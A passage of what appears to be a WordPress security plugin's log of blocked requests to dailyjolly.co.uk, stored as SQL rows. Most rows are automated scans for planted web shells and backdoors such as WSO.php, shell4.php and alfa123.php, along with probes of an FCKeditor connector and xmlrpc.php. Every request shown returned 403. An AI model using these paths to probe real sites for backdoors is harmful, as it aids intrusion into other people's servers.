3.5.30729)\"}','vDRbqIK49Ontiud02Lspch8T',0,1674492621.4012,184,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Xf5OKSFgtQ9szpIdlcnRAo01',0,1674492622.2801,175,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/xox.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','f4mF0qMGBewTtdlcCYSgr8KN',0,1674492623.1428,183,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','EhFglrxHpaVtumeZ7DTNq8UO',0,1674492624.0229,208,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wi.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ly3qD2RczahxTkWUE06SbjgL',0,1674492624.9195,180,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','6MX0tgBUi1fmywWC7rcEZ58p',0,1674492625.7941,214,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/root.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','3wIMUV0eRaNn1sH6PXiruvYm',0,1674492626.7016,176,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/nee.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','nw4Ddg5jS0mAVNoXGi7Hxz2J',0,1674492627.5940,236,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','AYJzfVKB5oxGuMZcT3W6y7sj',0,1674492628.5320,167,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/lol.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Um8eVTyjs9gqdlAR4kQPv6Of',0,1674492629.3908,168,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/87.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','tYRLNWIpPrAx4Fd3S8uMVCv2',0,1674492630.2439,176,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/7yn.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','8qiSKzkFpOCjVA6Iub4Y95XH',0,1674492631.1185,201,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/haxor.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','2ag8L6wDlX3thzr0BkcfPG7d',0,1674492632.0752,216,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/13.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','HSGlQCxY4KITo3uc0RDhPfLw',0,1674492633.0705,170,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/FoxWSOv1.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','haMz1sg0FLbV3r5KOZByPExj',0,1674492633.9455,168,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/alf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','3p5B8ZthaiLXS1nRmw0Tvclu',0,1674492634.8003,206,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/bb.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','FIgS47sel8notCOYrXzyMxqh',0,1674492635.7034,186,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','qRTSrO73mzvbUIoGK9JYW4Pn',0,1674492636.6014,208,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/WSO.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','M4aLeWAhlDXPd6w2TrY7xs3N',0,1674492637.9924,186,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/hello.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','VfXcuKAhqLsxaPROGUZSn1wE',0,1674492639.7963,222,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/if.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','pcEglSa0szR4yeOCI3dxHfA1',0,1674492641.1925,274,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/kk.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','kribenouBDvNQZK1E78Imzj0',0,1674492642.1973,233,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/mrjn.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','cuwDLlsjgxiqrv0y6VoBU9NE',0,1674492643.1344,179,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/kn.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','cE4hKtu29x3NIOLCnbFAXpY5',0,1674492644.0008,210,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/3301.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','JXksMgHGxuUnBiOpfSDjy2lK',0,1674492644.9100,189,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','JZfWOBklLRIxjVqpQw0Hom65',0,1674492645.8124,183,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/alex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','CjQnkYO6fcVabWpHBUtyDRrs',0,1674492646.6831,161,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','VdiKt6rTvqzPxQFbsMfwueAY',0,1674492647.5475,196,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/anone.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','NXIwoSLWUgqDt1efylmK2xph',0,1674492648.4309,180,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-configer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','3Fordx4M9QfCNajwXSHnJKks',0,1674492649.3639,208,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-ad.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','H5Xqt7OIwngBRcCjGsS0v4d3',0,1674492650.2893,165,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/send.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','OmDln6c2Iqp4f0SJVMKTGUuj',0,1674492651.1620,169,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/.wp-cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','CbQ10skAzVv3erUjJ9fma4BS',0,1674492652.0467,209,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/sendmail.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','pxkUOMh4dHW8E3SvugYiBe9N',0,1674492652.9690,216,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/rahma.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','QmDX8UMlThiqZObcF6xG57wP',0,1674492653.8888,167,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/nasgor.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','5wOHK3xQqjW1A6UzsIbehCMR',0,1674492654.7692,163,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-confirm.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','LhNYHP3oAlqTWpFIgVrO7jux',0,1674492655.6175,166,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/alfa123.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','9rVZWRYpyCuPAbqOFkNd71I4',0,1674492656.4702,179,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','VnOI9lHxqPAZ3m1YaWQJE067',0,1674492657.3541,167,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/bypass.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','bUrvfHWnAc9VP1iyeopwhkqO',0,1674492658.2170,194,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-one.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','OzdKcpsmlRTiLku3xh26AbFn',0,1674492659.1125,210,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/alexus.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','FC9OgKuTN3rkYwE1ZWndMmq4',0,1674492660.0135,201,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wso1337.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','5e6i41BzbpJlQntsh2wfjmK8',0,1674492660.9218,166,'','GET',403,0,700,0,1,'',0),('40.113.104.238',678521070,'','https://dailyjolly.co.uk/cgi-etc/xxxxxxxxxxxx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','PmHYDS8Cl4npgbqRBXIwyJ9s',0,1674524921.6795,247,'','GET',403,0,700,0,1,'',0),('40.113.104.238',678521070,'','https://dailyjolly.co.uk/wso112233.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','zrDSZKyfT0xmsUw264p3vBkj',0,1674528289.4147,280,'','GET',403,0,700,0,1,'',0),('3.95.191.101',56606565,'','https://dailyjolly.co.uk/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','bsXtYq8iNmMruFlpJIR2Q5V7',0,1674529155.2299,165,'','GET',403,0,700,0,1,'',0),('3.95.191.101',56606565,'','https://dailyjolly.co.uk/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','O46IsGYSjWbANh0wXmfdBqK1',0,1674529171.5650,201,'','GET',403,0,700,0,1,'',0),('3.95.191.101',56606565,'','https://dailyjolly.co.uk/wp-includes/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','DXMIxg0Jh28ECktANLSoWZ7q',0,1674529190.3835,203,'','GET',403,0,700,0,1,'',0),('3.95.191.101',56606565,'','https://dailyjolly.co.uk/wp-content/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','NXRh8SdEpszDyC23kojTeJr5',0,1674529204.2744,255,'','GET',403,0,700,0,1,'',0),('3.95.191.101',56606565,'','https://dailyjolly.co.uk/wp-admin/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','jm2XAoybhTFZBlegqxDWKiJ7',0,1674529218.6583,211,'','GET',403,0,700,0,1,'',0),('104.243.43.39',1760766759,'','https://dailyjolly.co.uk/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','H1sOr5l60Mwkei2QVuIZhWpP',0,1674548333.2856,271,'','POST',403,0,700,0,1,'',0),('104.243.43.39',1760766759,'','https://dailyjolly.co.uk/uowvuwvd.php?Fox=d3wL7','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','fWcBCPLxtVy7S6NuOHAh52rZ',0,1674548333.6581,175,'','GET',403,0,700,0,1,'',0),('185.36.81.21',3106165013,'','https://dailyjolly.co.uk/sites/all/modules/fckeditor/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/75.0.3770.100 Safari\\/537.36\"}','PhnIVxWKLojH7wOT6dBcfZXl',0,1674569719.2231,554,'','GET',403,0,700,0,1,'',0),('139.162.111.201',2342678473,'','https://www.dailyjolly.co.uk/about.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','ZdHJgFYNkG8MpUxvhKRI3swP',0,1674571869.9091,188,'','GET',403,0,700,0,1,'',0),('139.162.111.201',2342678473,'','https://www.dailyjolly.co.uk/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','MTqwfVkp0lu4mPagJQ7rxhoi',0,1674571871.2894,199,'','POST',403,0,700,0,1,'',0),('139.162.111.201',2342678473,'','https://www.dailyjolly.co.uk/wp-content/themes/classic/inc/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','qIJPyVK62S7FWaE0CxTdHGfb',0,1674571872.6346,203,'','GET',403,0,700,0,1,'',0),('139.162.111.201',2342678473,'','https://www.dailyjolly.co.uk/wp-content/wp-content.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','RYQmrpg8atAl36sNjJUVf1XW',0,1674571874.0171,231,'','GET',403,0,700,0,1,'',0),('139.162.111.201',2342678473,'','https://www.dailyjolly.co.uk/wp-content/plugins/core-stab/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','EAvkqQIwybfPuZW7eaNLTcJK',0,1674571876.1175,165,'','GET',403,0,700,0,1,'',0),('185.107.237.201',3110858185,'','https://dailyjolly.co.uk/sitemap.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"}','W7MJvzu2Hid5YD0EI4AycZL8',0,1674580166.8979,238,'','GET',403,0,700,0,1,'',0),('128.199.218.40',2160581160,'','https://dailyjolly.co.uk/wp-commentin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','H4IoiTY9DpjdP2Zx6US0NaL1',0,1674595167.1619,214,'','GET',403,0,700,0,1,'',0),('128.199.218.40',2160581160,'','https://dailyjolly.co.uk/wp-cc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 13_5 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) Version\\/13.1.1 Mobile\\/15E148 Safari\\/604.1\"}','a3FU5rhPgImOz1b9XioTcLqB',0,1674595167.1655,234,'','GET',403,0,700,0,1,'',0),('194.5.82.48',3255128624,'','https://dailyjolly.co.uk/wp-admin/imagescheckflush.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','tEC5ZiYupyJNSG2cO7baH3WF',0,1674604007.0102,202,'','POST',403,0,700,0,1,'',0),('178.62.67.97',2990424929,'','https://www.dailyjolly.co.uk/about.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','ujhZmyJga6LfNYq4TFOK1DwV',0,1674621808.5538,334,'','GET',403,0,700,0,1,'',0),('51.91.27.225',861608929,'','https://www.dailyjolly.co.uk/about.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','TCq6xl5egD7tUiEz3WpVAI4Z',0,1674621808.6742,280,'','GET',403,0,700,0,1,'',0),('178.62.67.97',2990424929,'','https://www.dailyjolly.co.uk/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','2WocFBijuJ4ANpd3QzRs9Thg',0,1674621809.0145,177,'','POST',403,0,700,0,1,'',0),('51.91.27.225',861608929,'','https://www.dailyjolly.co.uk/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','zsw4E7RCAdWxGBXHQmeoThb8',0,1674621809.1361,175,'','POST',403,0,700,0,1,'',0),('178.62.67.97',2990424929,'','https://www.dailyjolly.co.uk/wp-content/themes/classic/inc/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','4XuWSiyxGdhlazbkIsRJtNBT',0,1674621809.3216,174,'','GET',403,0,700,0,1,'',0),('51.91.27.225',861608929,'','https://www.dailyjolly.co.uk/wp-content/themes/classic/inc/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','FwXpi6sECTUdkmgJ0HKo8nu3',0,1674621809.3810,173,'','GET',403,0,700,0,1,'',0),('178.62.67.97',2990424929,'','https://www.dailyjolly.co.uk/wp-content/wp-content.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','j1xSr74gquiy5Id3O8WATVUZ',0,1674621809.5291,186,'','GET',403,0,700,0,1,'',0),('51.91.27.225',861608929,'','https://www.dailyjolly.co.uk/wp-content/wp-content.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','1veWFrNzin6UqBP0TI38EJx7',0,1674621809.6903,177,'','GET',403,0,700,0,1,'',0),('178.62.67.97',2990424929,'','https://www.dailyjolly.co.uk/wp-content/plugins/core-stab/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','c94giWqLDhFEawxUuApNfb1v',0,1674621809.8311,185,'','GET',403,0,700,0,1,'',0),('51.91.27.225',861608929,'','https://www.dailyjolly.co.uk/wp-content/plugins/core-stab/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','jURm6s1VdnzN98gkBFIDtaxi',0,1674621809.9259,182,'','GET',403,0,700,0,1,'',0),('20.231.18.49',350687793,'','https://www.dailyjolly.co.uk/wp-content/uploads/2022/05/.cpt_wyhta.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\"}','M7rHsxiYJVQDylacZ4N1oFuw',0,1674655121.6830,285,'','GET',403,0,700,0,1,'',0),('20.231.18.49',350687793,'','https://www.dailyjolly.co.uk/wp-content/uploads/typehub/custom/hafwg/.cpt.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\"}','WBjM5ErwaFAqXhCYRNH6DK4z',0,1674655123.4239,199,'','GET',403,0,700,0,1,'',0),('206.189.136.160',3468527776,'','https://www.dailyjolly.co.uk/wordpress/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','XMxTlKP3kEfCpArij7baY5Ge',0,1674657066.4749,2013,'','POST',403,0,700,0,1,'',0),('206.189.136.160',3468527776,'','https://www.dailyjolly.co.uk/wp/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','gwMbPRGh7JleB3cmT45vo2Xq',0,1674657069.2110,1449,'','POST',403,0,700,0,1,'',0),('90.156.169.206',1520216526,'','https://dailyjolly.co.uk/wp-admin/style.php?sig=rename','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko\\/20100101 Firefox\\/89.0\"}','wNHr8lv7WODI5BpidYcAZEnU',0,1674659542.8406,252,'','GET',403,0,700,0,1,'',0),('90.156.169.206',1520216526,'','https://dailyjolly.co.uk/style.php?sig=rename','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','ae47O6yNtQJZHDLY1M9KXh5b',0,1674659542.8326,271,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/shell4.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 